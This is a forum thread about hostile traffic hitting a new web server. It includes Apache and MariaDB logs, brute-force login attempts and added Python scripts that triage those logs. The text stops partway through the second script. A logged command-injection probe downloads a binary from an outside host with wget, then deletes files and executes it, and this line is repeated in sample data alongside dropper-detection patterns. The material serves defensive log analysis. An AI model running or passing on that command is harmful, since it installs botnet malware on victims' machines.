elhacker.net forum, Bugs y Exploits / Nivel Web (page 1 of 3)
Topic: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
el-brujo (ehn), 19 December 2020, 12:43 pm:

I set up a brand-new web server with no content or anything on it, and within a few minutes I'm already receiving malicious requests xD

Quote:
85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


I think it would be interesting to publish the web server's mod_security log to see the inhuman number of requests.

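The log above is the background noise every Internet-facing host receives. The following triage script is an added example (mine, not code from the post) that parses lines in the Apache/nginx combined format and tags the three kinds of traffic visible in it: the command-injection probe that fetches and runs a binary with wget (the dropper host is extracted as an indicator to block), scanner banners such as zgrab and masscan, and TLS ClientHello records (`\x16\x03\x01`) arriving on the plaintext port. The sample lines are constructed to mirror the post; the signature lists are a starting point rather than a ruleset, and the rule for the `/index.php?s=/index/...` lines assumes they are ThinkPHP invokefunction probes whose `\think` the forum rendered as a tab.

```python
"""Triage web-server access-log lines for scanner noise and exploit probes.

Added example for this thread, not code from the original post. The sample
lines are constructed to mirror the shapes in the post; the signature lists
are a starting point to extend, not a complete ruleset.
"""
import re
from collections import defaultdict

# Apache/nginx "combined" format:
#   ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shell separators (raw or URL-encoded) plus a download/exec word in the URI:
# the /shell?cd+/tmp;rm+-rf+*;wget+... probe from the post.
SHELL_SEP_RE = re.compile(r';|\|\||&&|%3b|%7c|%26%26', re.IGNORECASE)
DROPPER_WORDS = ("wget", "curl", "tftp", "chmod", "/tmp/", "/bin/sh", "busybox")
# Host that follows wget/curl in the payload: the malware distribution server.
DROPPER_HOST_RE = re.compile(
    r'(?:wget|curl)\+(?:-\S+?\+)*(?:https?://)?([\w.-]+)', re.IGNORECASE)

# ThinkPHP 5.x invokefunction probe. Assumption: the post shows it as
# "/index/ hink" because the forum rendered the "\t" of "\think" as a tab,
# so accept a backslash, whitespace, or nothing before "think"/"hink".
THINKPHP_RE = re.compile(r's=/index/[\\\s]*t?hink|invokefunction', re.IGNORECASE)

# Internet-wide scanner banners (zgrab and masscan appear in the post).
SCANNER_UA_RE = re.compile(r'zgrab|masscan|nmap|censys', re.IGNORECASE)


def classify(line):
    """Return the tags that make one log line suspicious ([] if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    req, ua = m.group("request"), m.group("ua")
    # Apache writes non-printable bytes as \xNN. 0x16 0x03 0x01 is a TLS
    # handshake record header (ClientHello) sent to the plaintext HTTP port.
    if req.startswith("\\x16\\x03\\x01"):
        return ["tls-clienthello-on-http-port"]
    tags = []
    parts = req.split(" ")
    uri = parts[1] if len(parts) >= 2 else ""
    if " HTTP/" not in req:
        tags.append("malformed-request-line")
    if THINKPHP_RE.search(uri):
        tags.append("thinkphp-rce-probe")
    if SHELL_SEP_RE.search(uri) and any(w in uri.lower() for w in DROPPER_WORDS):
        tags.append("command-injection-probe")
        host = DROPPER_HOST_RE.search(uri)
        if host:
            tags.append("dropper-host:" + host.group(1))
    scanner = SCANNER_UA_RE.search(ua)
    if scanner:
        tags.append("scanner-ua:" + scanner.group(0).lower())
    return tags


def triage(lines):
    """Map each source IP to the sorted set of tags its requests triggered."""
    per_ip = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        per_ip[m.group("ip") if m else "?"].update(classify(line))
    return {ip: sorted(t) for ip, t in per_ip.items() if t}


def dropper_hosts(lines):
    """Hosts named in download commands inside injection probes (IOCs to block)."""
    return {t.split(":", 1)[1] for line in lines for t in classify(line)
            if t.startswith("dropper-host:")}


# Constructed sample, modelled on the lines in the post (last line is benign).
SAMPLE = [
    '85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/\think" 400 226 "-" "-"',
    '68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"',
    '192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"',
    '192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\\x16\\x03\\x01" 400 226 "-" "-"',
    '165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"',
    '203.0.113.7 - - [14/Dec/2020:16:20:00 +0100] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, tags in triage(SAMPLE).items():
        print(ip, ", ".join(tags))
    print("block:", sorted(dropper_hosts(SAMPLE)))
```

The probe in the post got a 404, so nothing was executed; the useful output is the dropper host, which belongs on the egress block list and in a threat-intel lookup. Feed real logs with `triage(open("access.log"))`.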
BloodSharp, reply #1, 19 December 2020, 13:24 pm:

Quote:
I set up a brand-new web server with no content or anything on it, and within a few minutes I'm already receiving malicious requests xD

They dropped a shell on you that quickly? It must be because of Shodan, ZoomEye and other alternative scanners...


@XSStringManolo (Hacker/Programador, Colaborador), reply #2, 19 December 2020, 17:12 pm:

Quite a lot of time passes between requests and the IP changes. Is it manual?

#!drvy, reply #3, 19 December 2020, 17:22 pm:

This is more than common. They are automated scanners that spend their time testing for known vulnerabilities. The same thing happens over SSH... as soon as you bring up a server (assign it an IP) you already have login attempts.

Regards

@XSStringManolo, reply #4, 19 December 2020, 17:49 pm:

It used to happen to me a lot on one particular network, but in general I don't get requests like that on servers.

el-brujo, reply #5, 19 December 2020, 20:44 pm:

Quote from #!drvy:
This is more than common. They are automated scanners that spend their time testing for known vulnerabilities. The same thing happens over SSH... as soon as you bring up a server (assign it an IP) you already have login attempts.

Regards

That's what I think too, they are automated, looking for new victims...

Yeah, Fail2ban never stops working on SSH. The failed SSH connection attempts are even more outrageous... I think I had 143 in just a few days.

One day I decided to look at the wp-login.php statistics of a WordPress site and the number of login attempts was alarming too. Especially one IP that made thousands of attempts every day xD

el-brujo, reply #6, 6 January 2021, 13:09 pm:

By default, accepting external mysql connections is a mistake.

For a few hours I forgot to add skip-networking to MariaDB's (MySQL) my.cnf

Code:
2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2072 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2073 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2075 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2077 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2078 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2079 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2080 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2081 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2082 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2083 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2084 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2085 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2086 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2087 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2088 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2089 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2090 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2091 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2092 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2093 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2094 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2095 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2096 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2097 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2098 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2099 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2100 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2101 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2102 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2103 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2104 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2105 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2106 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2107 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2108 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2109 [Warning] Access denied for user 'moves'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2110 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2111 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2112 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2113 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2114 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2115 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2116 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2117 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2118 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2119 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2120 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2122 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2123 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2124 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2125 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2126 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2127 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2128 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2129 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2130 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2131 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2132 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2133 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2134 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2135 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2136 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2137 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2138 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2139 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2140 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2141 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:08 2142 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2143 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2144 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2145 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2146 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2147 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2148 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2149 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2150 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:12 2151 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:12 2152 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2153 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2154 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2155 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2156 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2157 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2158 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2159 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2160 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2161 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2162 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2163 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2164 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2165 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2166 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2167 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2168 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2169 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2170 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2171 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2172 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2173 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2174 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2175 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2176 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2177 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2178 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:22 2179 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.
2020-12-15 12:42:01 2297 [Note] Hostname 'zg-0915b-171.stretchoid.com' has the following IP addresses:
2020-12-15 12:42:01 2297 [Note]  - 91.126.217.153
2020-12-15 14:12:35 2444 [Warning] IP address '42.192.225.22' could not be resolved: Name or service not known
2020-12-15 14:12:35 2444 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:36 2445 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2446 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2447 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:38 2448 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:39 2449 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:43 2450 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2451 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2452 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:47 2453 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:49 2454 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:52 2455 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:54 2456 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:02 2457 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:04 2459 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:05 2460 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:07 2461 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:08 2462 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2463 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2464 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:14 2465 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:15 2466 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:16 2467 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2468 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2469 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:18 2470 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:19 2471 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2472 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2473 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2474 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2475 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:26 2476 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2477 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2478 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:28 2479 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:31 2480 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:32 2481 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:33 2482 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:34 2483 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:35 2484 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:36 2485 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2486 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2487 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:39 2488 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:42 2489 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:44 2490 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:45 2491 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:46 2492 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:52 2493 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:55 2494 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:57 2495 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:58 2496 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:00 2498 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:01 2499 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:02 2500 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2501 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2502 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:06 2503 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:08 2504 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:10 2505 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:11 2506 [Warning] Access denied for user 'test1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:12 2507 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:13 2508 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:14 2509 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)

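The error-log excerpt above shows two distinct dictionary attacks: one source cycling root/admin/mcUser/moves/cloudera at roughly two attempts per second, a slower one trying root/admin/mysql/test/user/guest. The script below is an added example (my code, not from the post) that parses these `Access denied` warnings, summarises per source host how many attempts, which usernames and at what rate, and applies the same sliding-window rule fail2ban uses (maxretry failures within findtime seconds) to decide which hosts to ban. The sample lines are constructed to mirror the excerpt, with one internal typo added for contrast; the thresholds are assumptions.

```python
"""Summarise MariaDB/MySQL "Access denied" warnings per source host.

Added example for this thread, not code from the post. The sample lines are
constructed to mirror the error-log excerpt above (same format, same two
source hosts, plus one internal typo for contrast); thresholds are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# MariaDB error log: "<date> <time> <conn-id> [Warning] Access denied for user
# '<user>'@'<host>' (using password: YES|NO)"
DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \d+ \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)' "
    r"\(using password: (?P<pw>YES|NO)\)$"
)


def parse_denied(lines):
    """Yield (timestamp, source_host, username, sent_a_password) per denied login."""
    for line in lines:
        m = DENIED_RE.match(line)
        if m:
            yield (datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
                   m.group("host"), m.group("user"), m.group("pw") == "YES")


def summarise(lines):
    """Per source host: attempts, usernames tried, time span and attempts/second."""
    stats = {}
    for ts, host, user, _ in parse_denied(lines):
        s = stats.setdefault(host, {"attempts": 0, "users": set(),
                                    "first": ts, "last": ts})
        s["attempts"] += 1
        s["users"].add(user)
        s["first"], s["last"] = min(s["first"], ts), max(s["last"], ts)
    for s in stats.values():
        secs = max((s["last"] - s["first"]).total_seconds(), 1.0)
        s["per_second"] = round(s["attempts"] / secs, 2)
        s["users"] = sorted(s["users"])
    return stats


def offenders(lines, maxretry=5, findtime=600):
    """fail2ban-style sliding window: hosts with >= maxretry failures inside
    findtime seconds. Defaults mirror a typical jail, not a recommendation."""
    recent = defaultdict(deque)
    span = timedelta(seconds=findtime)
    banned = set()
    for ts, host, _, _ in sorted(parse_denied(lines)):
        q = recent[host]
        q.append(ts)
        while ts - q[0] > span:          # drop failures older than the window
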